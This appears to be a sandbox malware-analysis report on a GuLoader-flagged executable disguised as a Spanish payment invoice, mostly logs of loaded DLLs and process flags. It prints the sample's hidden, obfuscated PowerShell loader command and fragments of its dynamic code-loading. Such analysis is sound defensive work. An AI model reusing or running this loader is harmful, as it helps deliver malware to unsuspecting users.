Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PAGO FRAS. AGOSTO 2024..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: em.Core.pdbFp3 source: powershell.exe, 00000001.00000002.1874467014.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.1874467014.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.1875277086.0000000009583000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Eldreven $Paddehattens $Filtilgange), (Aruspex @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:stamina = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Intrabiontic)), $Korfitzs).DefineDynamicModule($Retmaessig, $false).DefineType($Vulcanize, $Compulsiveness, [System.MulticastDelegate]

Suspicious powershell command line found

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07A359FB push ebp; retf	1_2_07A359FC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07A3ED60 pushfd ; ret	1_2_07A3ED61
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_09453548 push 8BD38B50h; iretd	1_2_0945354E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
